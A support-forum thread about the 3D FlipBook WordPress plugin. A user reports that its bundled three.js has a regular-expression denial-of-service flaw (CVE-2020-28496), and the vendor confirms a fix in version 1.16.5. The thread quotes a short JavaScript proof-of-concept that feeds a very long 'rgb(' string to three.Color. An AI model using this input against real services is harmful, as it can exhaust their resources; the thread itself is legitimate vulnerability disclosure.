3D FlipBook - The three.js version currently used by 3D FlipBook has a vulnerability

y***n@mail.nptu.edu.tw
2024-09-02
2024-09-05

I scanned my WordPress site using Acunetix and it shows the three.js version currently used by 3D FlipBook has a vulnerability.

The detailed scan report is as follows

This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC:

var three =require('three')
function build_blank (n) {
    var ret = "rgb("
    for (var i = 0; i < n; i++) {
        ret += " "
    }
    return ret + "";
}
var Color =three.Color
var time = Date.now();
new Color(build_blank(50000))
var time_cost = Date.now() - time;
console.log(time_cost+" ms")

References CVE-2020-28496 (https://nvd.nist.gov/vuln/detail/CVE-2020-28496) CVE-2020-28496 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28496)

Replies

a***r@3dflipbook.net
2024-09-03
2024-09-03

Thank you for your report, we are already working on this issue.

a***r@3dflipbook.net
2024-09-05
2024-09-05

Fixed in 1.16.5, please let me know if Acunetix says something else.

y***n@mail.nptu.edu.tw
2024-10-06
2024-10-06

After updating to version 1.16.5 or later, Acunetix scan showed it fixed.

Log In to leave a comment
© iberezansky All rights reserved